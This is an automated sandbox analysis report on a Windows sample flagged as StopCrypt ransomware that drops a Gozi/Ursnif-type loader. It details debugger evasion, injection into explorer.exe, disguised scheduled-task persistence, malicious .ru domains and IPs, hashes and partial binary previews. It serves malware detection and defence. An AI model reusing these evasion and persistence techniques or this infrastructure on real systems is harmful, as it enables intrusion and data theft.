                Source: 3196.exe, 00000005.00000002.458833552.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\]
                Source: 3196.exe, 00000005.00000000.450316157.0000000000662000.00000002.00000001.01000000.00000007.sdmp, 3196.exe.1.drBinary or memory string: jdfffgdkddfffkshgfs

                Anti Debugging

                barindex
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                Source: C:\Users\user\Desktop\cqu7x.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\vcivdjdSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_0040134F LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\Desktop\cqu7x.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\vcivdjdProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\3196.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: vcivdjd.1.drJump to dropped file
                Source: C:\Windows\explorer.exeDomain query: dindunketagestan.ru
                Source: C:\Windows\explorer.exeDomain query: kukaryka.ru
                Source: C:\Users\user\Desktop\cqu7x.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\Desktop\cqu7x.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Roaming\vcivdjdSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Roaming\vcivdjdSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\Desktop\cqu7x.exeThread created: C:\Windows\explorer.exe EIP: 2B21A0C
                Source: C:\Users\user\AppData\Roaming\vcivdjdThread created: unknown EIP: 2B41A0C
                Source: C:\Users\user\AppData\Local\Temp\3196.exeProcess created: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe "C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe"
                Source: explorer.exe, 00000001.00000000.333855555.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.400604224.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.376202069.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
                Source: explorer.exe, 00000001.00000000.413325758.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.406921361.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.385911308.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000001.00000000.333855555.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.400604224.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.376202069.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000001.00000000.399977921.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.375933327.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.333600571.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
                Source: explorer.exe, 00000001.00000000.333855555.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.400604224.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.376202069.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\AppData\Local\Temp\3196.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3196.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\3196.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_004354EC cpuid
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exeCode function: 6_2_004354EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.vcivdjd.4d0e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.cqu7x.exe.520000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vcivdjd.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.vcivdjd.4e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cqu7x.exe.510e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cqu7x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.459393089.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.322194744.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.d394a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.586624507.0000000000D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 4.2.vcivdjd.4d0e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.cqu7x.exe.520000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vcivdjd.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.vcivdjd.4e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cqu7x.exe.510e50.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cqu7x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.415776182.0000000002381000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.415123167.0000000000520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.459393089.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.471472153.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.471974631.0000000000911000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.401881839.0000000002B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.322194744.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                Input Capture
                1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium13
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts12
                Native API
                Boot or Logon Initialization Scripts312
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol1
                Input Capture
                Exfiltration Over Bluetooth2
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Exploitation for Client Execution
                Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                Software Packing
                NTDS136
                System Information Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer124
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets421
                Security Software Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                File Deletion
                Cached Domain Credentials241
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                Masquerading
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job241
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Application Window Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                Hidden Files and Directories
                Network Sniffing1
                Remote System Discovery
                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 743908 Sample: cqu7x.exe Startdate: 11/11/2022 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 5 other signatures 2->46 8 cqu7x.exe 2->8         started        11 vcivdjd 2->11         started        process3 signatures4 60 Detected unpacking (changes PE section rights) 8->60 62 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->62 64 Maps a DLL or memory area into another process 8->64 72 2 other signatures 8->72 13 explorer.exe 4 8->13 injected 66 Antivirus detection for dropped file 11->66 68 Multi AV Scanner detection for dropped file 11->68 70 Machine Learning detection for dropped file 11->70 process5 dnsIp6 36 kukaryka.ru 80.76.42.141, 49696, 80 HostingvpsvilleruRU Russian Federation 13->36 38 dindunketagestan.ru 37.140.192.158, 49695, 80 AS-REGRU Russian Federation 13->38 28 C:\Users\user\AppData\Roaming\vcivdjd, PE32 13->28 dropped 30 C:\Users\user\AppData\Local\Temp\3196.exe, PE32 13->30 dropped 32 C:\Users\user\...\vcivdjd:Zone.Identifier, ASCII 13->32 dropped 74 System process connects to network (likely due to code injection or exploit) 13->74 76 Benign windows process drops PE files 13->76 78 Deletes itself after installation 13->78 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->80 18 3196.exe 3 13->18         started        file7 signatures8 process9 file10 26 loader_250246_15072022_2203_31102022.exe, PE32 18->26 dropped 48 Multi AV Scanner detection for dropped file 18->48 50 Machine Learning detection for dropped file 18->50 22 loader_250246_15072022_2203_31102022.exe 6 18->22         started        signatures11 process12 dnsIp13 34 telemetry.skype.com 22->34 52 Antivirus detection for dropped file 22->52 54 Multi AV Scanner detection for dropped file 22->54 56 Found evasive API chain (may stop execution after checking system information) 22->56 58 4 other signatures 22->58 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                cqu7x.exe92%ReversingLabsWin32.Ransomware.StopCrypt
                cqu7x.exe41%MetadefenderBrowse
                cqu7x.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe100%AviraTR/Crypt.XPACK.Gen7
                C:\Users\user\AppData\Roaming\vcivdjd100%AviraTR/AD.GenSHCode.nsnoi
                C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\3196.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\vcivdjd100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\3196.exe60%ReversingLabsWin32.Infostealer.Gozi
                C:\Users\user\AppData\Local\Temp\3196.exe0%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\loader_250246_15072022_2203_31102022.exe88%ReversingLabsWin32.Trojan.Ursnif
                C:\Users\user\AppData\Roaming\vcivdjd92%ReversingLabsWin32.Ransomware.StopCrypt
                C:\Users\user\AppData\Roaming\vcivdjd41%MetadefenderBrowse
                SourceDetectionScannerLabelLinkDownload
                4.2.vcivdjd.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.cqu7x.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                4.2.vcivdjd.4d0e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.2.loader_250246_15072022_2203_31102022.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                5.2.3196.exe.2aed320.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                0.2.cqu7x.exe.510e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                4.3.vcivdjd.4e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.loader_250246_15072022_2203_31102022.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                0.3.cqu7x.exe.520000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                4.0.vcivdjd.400000.0.unpack100%AviraTR/AD.GenSHCode.nsnoiDownload File
                0.0.cqu7x.exe.400000.0.unpack100%AviraTR/AD.GenSHCode.nsnoiDownload File
                6.2.loader_250246_15072022_2203_31102022.exe.430000.1.unpack100%AviraHEUR/AGEN.1245293Download File
                5.2.3196.exe.2ae3f04.0.unpack100%AviraTR/Patched.Ren.Gen4Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://kukaryka.ru/iTunesHelper.exe0%Avira URL Cloudsafe
                http://dindunketagestan.ru/100%Avira URL Cloudmalware
                http://klenoviycdesss.ru/100%Avira URL Cloudmalware
                http://goalichkindomik.ru/100%Avira URL Cloudmalware
                http://pali44unkis9.ru/100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                kukaryka.ru
                80.76.42.141
                truetrue
                  unknown
                  dindunketagestan.ru
                  37.140.192.158
                  truetrue
                    unknown
                    telemetry.skype.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://dindunketagestan.ru/true
                      • Avira URL Cloud: malware
                      unknown
                      http://goalichkindomik.ru/true
                      • Avira URL Cloud: malware
                      unknown
                      http://kukaryka.ru/iTunesHelper.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://pali44unkis9.ru/true
                      • Avira URL Cloud: malware
                      unknown
                      http://klenoviycdesss.ru/true
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.351811387.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.385722347.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.412288858.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://telemetry.skype.com/drew/loader_250246_15072022_2203_31102022.exe, 00000006.00000002.586272240.0000000000683000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          80.76.42.141
                          kukaryka.ruRussian Federation
                          59504HostingvpsvilleruRUtrue
                          37.140.192.158
                          dindunketagestan.ruRussian Federation
                          197695AS-REGRUtrue
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:743908
                          Start date and time:2022-11-11 12:20:50 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 9m 58s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:cqu7x.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@6/5@3/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 26.3% (good quality ratio 21.1%)
                          • Quality average: 61.5%
                          • Quality standard deviation: 38.6%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                          • TCP Packets have been reduced to 100
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: cqu7x.exe
                          TimeTypeDescription
                          12:22:52Task SchedulerRun new task: Firefox Default Browser Agent FF0B2E03076B2EE3 path: C:\Users\user\AppData\Roaming\vcivdjd
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Users\user\AppData\Local\Temp\3196.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):318
                          Entropy (8bit):5.328221768301982
                          Encrypted:false
                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21xDzzAbDLIP12MUAvvrs:Q3La/KDLI4MWuPk21xzAbDLI4M6
                          MD5:A8617BB66B0F42A0977DF68F1F3EC4D9
                          SHA1:62F80555AD6646F99D50D30DF45A31BEFD39B979
                          SHA-256:837C3675B523F6544589282CE8AAE12596E28D774EA57B1E451197282457380A
                          SHA-512:8FE4A70B4B443D2A1EBA29B7057E939BB51D4664B2E7690ABF1212FE5FE5D1E4703D26D36DEBB33246E44A02AA327F0E7A1FA29DFFB20A9EA875DE8D66515E9F
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                          Process:C:\Windows\explorer.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:modified
                          Size (bytes):177152
                          Entropy (8bit):6.165264026719155
                          Encrypted:false
                          SSDEEP:1536:9l1AnQTYGYqo/+sJfMd7FcknnLPSWRGmZkAh7g6PhSv4+v/T3Yh6uD:nwOYGYqo/+sq/Hnz3GmZkAW6P8dv/k
                          MD5:969DB79BF21624D4135B30DF17777ABA
                          SHA1:FE423D6CAAB77AB2CE702CE1397B214ED8093AB0
                          SHA-256:EBB5F9156BCE0A442EA4BC5FF67418204D95323C910592E1C1F00DD3BD2A49B2
                          SHA-512:40DA08854410F6817F3975B56C796E54FAE84F50D0B70F46A496A9A695EA5124E9A80000B893618DF789A4138B52A5B526B8C82044F3D90D71123C40982DADAF
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 60%
                          • Antivirus: Metadefender, Detection: 0%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,ycc.............................&... ...@....@.. ....................... ............@.................................w&..J....@.............................................................................. ............... ..H............text........ ...................... ..`.rsrc.......@......................@..@.reloc..............................@..B.................&......H........?..dK..........$...S...@?........................................*...*..0..........+O8P....8P...+*~7...+M+N+O+W+[.0%,.2.+X.-..91.......-..X..~9....(.....,.2..%,.*.*.8.....8.....8.....+..+.(....8.....8.....8.....+....0..........+O8P....8P...+*~7...+M+N+O+W+[.0%,.2.+X.-..91.......-..X..~9....(.....,.2..%,.*.*.8.....8.....8.....+..+.(....8.....8.....8.....+....0..........+O8P....8P...+*~7...+M+N+O+W+[.0%,.2.+X.-..91.......-..X..~9....(.....,.2..%,.*.*.8.....8.....8.....
                          Process:C:\Users\user\AppData\Local\Temp\3196.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):37888
                          Entropy (8bit):7.523503879141569
                          Encrypted:false
                          SSDEEP:768:6QLm41fM01vAR8YQIpQCtjiNm9B/HGucKWP2LgEGoD5HCK0TOCLK:6L41fMSvZYQOtjQq+fKW+LgEr5HV6OU
                          MD5:F777E421EAB950176F802D8B92A50F7A
                          SHA1:487EFF0E06148C4AB7DD7751AF9D0911F287094E
                          SHA-256:3175BEC39DAE6E45C0C6F8A32D5B03442C70B2D7FF8E0F08B14AC3C85585D58E
                          SHA-512:D76472816984BAA22CCE7B768DF349C9A9CBE676324AA1538B2A64AC8CA364AF362570B1EA80186DECBD4589363D4E1B482D339FB92A0669A4699E9F18E4D550
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 88%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x..x...x..vx...x..kx...x..nx...xRich...x........PE..L....%c............................/........ ....@.......................................................................... ..P....P.......................`....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....bss.........@......................@....rsrc........P....... ..............@..@.reloc.......`...r..."..............@..@........................................JJ.!.E...J...b..........................................................................................................................................................................................................................................................
                          Process:C:\Windows\explorer.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):247296
                          Entropy (8bit):6.768416698427892
                          Encrypted:false
                          SSDEEP:6144:1tuR8wBTKFro1C/JVn8lYShHZLnlgWuydU:1cR8oKFro1CXUYShH3gH
                          MD5:E449924B8AA04FA2E032511CF86D2482
                          SHA1:BC9C00E0841A84FBC45D9EF36422EAC3590B590F
                          SHA-256:B9FD7622C3FCFDD6EB9B2CB917A3CB64EB35C61221DE4866303CA88D828D5BED
                          SHA-512:584883254751227D886440EA8E2A63C082350D68F52C8093AE0531FB30AD8A50DAA22EDE8FA130A03F611974F46706AFB6EDF475579F246404FD367E8B8CBB57
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 92%
                          • Antivirus: Metadefender, Detection: 41%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............q...q...q.....q.....q..`....q...p.4.q......q......q.......q.Rich..q.................PE..L......_.................P...:...............`....@..........................p......RL.......................................L..<........W..........................@................................~..@............................................text....N.......P.................. ..`.data........`.......T..............@....rsrc....W.......X...n..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\explorer.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):6.768416698427892
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.83%
                          • Windows Screen Saver (13104/52) 0.13%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:cqu7x.exe
                          File size:247296
                          MD5:e449924b8aa04fa2e032511cf86d2482
                          SHA1:bc9c00e0841a84fbc45d9ef36422eac3590b590f
                          SHA256:b9fd7622c3fcfdd6eb9b2cb917a3cb64eb35c61221de4866303ca88d828d5bed
                          SHA512:584883254751227d886440ea8e2a63c082350d68f52c8093ae0531fb30ad8a50daa22ede8fa130a03f611974f46706afb6edf475579f246404fd367e8b8cbb57
                          SSDEEP:6144:1tuR8wBTKFro1C/JVn8lYShHZLnlgWuydU:1cR8oKFro1CXUYShH3gH
                          TLSH:CA348D10BB90D035F1B716F8497A939CA93E7EE19B3491CB62D526EE56346E0EC3030B
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............q...q...q.......q.......q..`....q...p.4.q.......q.......q.......q.Rich..q.................PE..L......_.................P.
                          Icon Hash:aedaae9ecea62aa2
                          Entrypoint:0x409c10
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5FB095A3 [Sun Nov 15 02:42:43 2020 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:d7546d6a0321f36858292bbca231c426
                          Instruction
                          mov edi, edi
                          push ebp
                          mov ebp, esp
